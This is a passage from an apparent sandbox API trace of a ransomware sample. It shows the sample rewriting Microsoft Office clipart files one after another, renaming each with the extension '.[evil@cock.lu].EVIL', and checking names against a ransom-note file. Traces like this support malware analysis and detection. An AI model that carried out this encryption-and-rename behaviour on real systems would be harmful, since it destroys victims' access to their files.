lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4480, lpOverlapped=0x0) returned 1 [0147.472] CloseHandle (hObject=0x1a8) returned 1 [0147.472] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.473] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.473] __uncaught_exception () returned 0x84b1160800 [0147.473] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.473] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf.[evil@cock.lu].evil")) returned 1 [0147.474] ??_V@YAXPEAX@Z () returned 0x1 [0147.477] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF", dwFileAttributes=0x200) returned 0 [0147.477] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.477] wcsstr (_Str="J0153508.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.477] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 69 [0147.477] wcscmp (_String1="J0153508.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.477] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153508.WMF") returned 0x0 [0147.477] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 0x45 [0147.477] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.479] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x85d0, lpOverlapped=0x0) returned 1 [0147.488] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.488] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.488] _errno () returned 0x84b1160840 [0147.488] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.488] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x85e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x85e0, lpOverlapped=0x0) returned 1 [0147.488] CloseHandle (hObject=0x1a8) returned 1 [0147.489] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.489] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.489] __uncaught_exception () returned 0x84b1160800 [0147.489] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.489] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf.[evil@cock.lu].evil")) returned 1 [0147.490] ??_V@YAXPEAX@Z () returned 0x1 [0147.493] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF", dwFileAttributes=0x200) returned 0 [0147.493] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.493] wcsstr (_Str="J0153514.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.493] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 69 [0147.493] wcscmp (_String1="J0153514.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.493] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153514.WMF") returned 0x0 [0147.493] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 0x45 [0147.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.496] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x31d0, lpOverlapped=0x0) returned 1 [0147.498] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.498] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.498] _errno () returned 0x84b1160840 [0147.498] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.498] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x31e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x31e0, lpOverlapped=0x0) returned 1 [0147.499] CloseHandle (hObject=0x1a8) returned 1 [0147.499] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.499] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.499] __uncaught_exception () returned 0x84b1160800 [0147.499] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.499] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf.[evil@cock.lu].evil")) returned 1 [0147.500] ??_V@YAXPEAX@Z () returned 0x1 [0147.503] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF", dwFileAttributes=0x200) returned 0 [0147.503] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.503] wcsstr (_Str="J0153516.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.503] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 69 [0147.504] wcscmp (_String1="J0153516.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.504] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153516.WMF") returned 0x0 [0147.504] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 0x45 [0147.504] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.506] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d08, lpOverlapped=0x0) returned 1 [0147.509] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.509] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.509] _errno () returned 0x84b1160840 [0147.509] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.509] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1d20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1d20, lpOverlapped=0x0) returned 1 [0147.510] CloseHandle (hObject=0x1a8) returned 1 [0147.510] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.510] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.510] __uncaught_exception () returned 0x84b1160800 [0147.510] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.510] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf.[evil@cock.lu].evil")) returned 1 [0147.511] ??_V@YAXPEAX@Z () returned 0x1 [0147.514] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF", dwFileAttributes=0x200) returned 0 [0147.514] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.514] wcsstr (_Str="J0153518.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.514] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF") returned 69 [0147.514] wcscmp (_String1="J0153518.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.514] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0153518.WMF") returned 0x0 [0147.514] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF") returned 0x45 [0147.514] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153518.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.516] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x30f0, lpOverlapped=0x0) returned 1 [0147.520] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.520] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.520] _errno () returned 0x84b1160840 [0147.520] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.521] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3100, lpOverlapped=0x0) returned 1 [0147.521] CloseHandle (hObject=0x1a8) returned 1 [0147.521] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.521] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.521] __uncaught_exception () returned 0x84b1160800 [0147.521] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.521] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153518.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153518.wmf.[evil@cock.lu].evil")) returned 1 [0147.522] ??_V@YAXPEAX@Z () returned 0x1 [0147.525] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF", dwFileAttributes=0x200) returned 0 [0147.525] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.525] wcsstr (_Str="J0156537.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.525] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF") returned 69 [0147.526] wcscmp (_String1="J0156537.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.526] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0156537.WMF") returned 0x0 [0147.526] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF") returned 0x45 [0147.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0156537.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.528] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x560, lpOverlapped=0x0) returned 1 [0147.540] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.540] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.540] _errno () returned 0x84b1160840 [0147.540] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.540] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x580, lpOverlapped=0x0) returned 1 [0147.541] CloseHandle (hObject=0x1a8) returned 1 [0147.541] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.541] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.541] __uncaught_exception () returned 0x84b1160800 [0147.541] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.541] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0156537.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0156537.wmf.[evil@cock.lu].evil")) returned 1 [0147.542] ??_V@YAXPEAX@Z () returned 0x1 [0147.545] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF", dwFileAttributes=0x200) returned 0 [0147.545] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.545] wcsstr (_Str="J0157167.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.545] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF") returned 69 [0147.545] wcscmp (_String1="J0157167.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.545] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0157167.WMF") returned 0x0 [0147.545] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF") returned 0x45 [0147.545] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157167.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.547] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb66e, lpOverlapped=0x0) returned 1 [0147.552] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.552] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.552] _errno () returned 0x84b1160840 [0147.552] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.552] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xb680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb680, lpOverlapped=0x0) returned 1 [0147.553] CloseHandle (hObject=0x1a8) returned 1 [0147.553] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.553] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.553] __uncaught_exception () returned 0x84b1160800 [0147.553] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.553] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157167.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157167.wmf.[evil@cock.lu].evil")) returned 1 [0147.554] ??_V@YAXPEAX@Z () returned 0x1 [0147.557] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF", dwFileAttributes=0x200) returned 0 [0147.557] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.557] wcsstr (_Str="J0157177.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.557] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF") returned 69 [0147.557] wcscmp (_String1="J0157177.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.557] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0157177.WMF") returned 0x0 [0147.558] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF") returned 0x45 [0147.558] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157177.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.560] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x54d4, lpOverlapped=0x0) returned 1 [0147.566] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.566] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.566] _errno () returned 0x84b1160840 [0147.567] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.567] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x54e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x54e0, lpOverlapped=0x0) returned 1 [0147.567] CloseHandle (hObject=0x1a8) returned 1 [0147.567] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.567] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.567] __uncaught_exception () returned 0x84b1160800 [0147.567] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.568] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157177.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157177.wmf.[evil@cock.lu].evil")) returned 1 [0147.568] ??_V@YAXPEAX@Z () returned 0x1 [0147.571] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF", dwFileAttributes=0x200) returned 0 [0147.572] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.572] wcsstr (_Str="J0157191.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.572] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF") returned 69 [0147.572] wcscmp (_String1="J0157191.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.572] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0157191.WMF") returned 0x0 [0147.572] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF") returned 0x45 [0147.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157191.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.574] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x45f8, lpOverlapped=0x0) returned 1 [0147.580] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.580] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.580] _errno () returned 0x84b1160840 [0147.580] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.580] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4600, lpOverlapped=0x0) returned 1 [0147.580] CloseHandle (hObject=0x1a8) returned 1 [0147.580] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.581] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.581] __uncaught_exception () returned 0x84b1160800 [0147.581] fclose (in: _File=0x7ffc020ee2a0 | 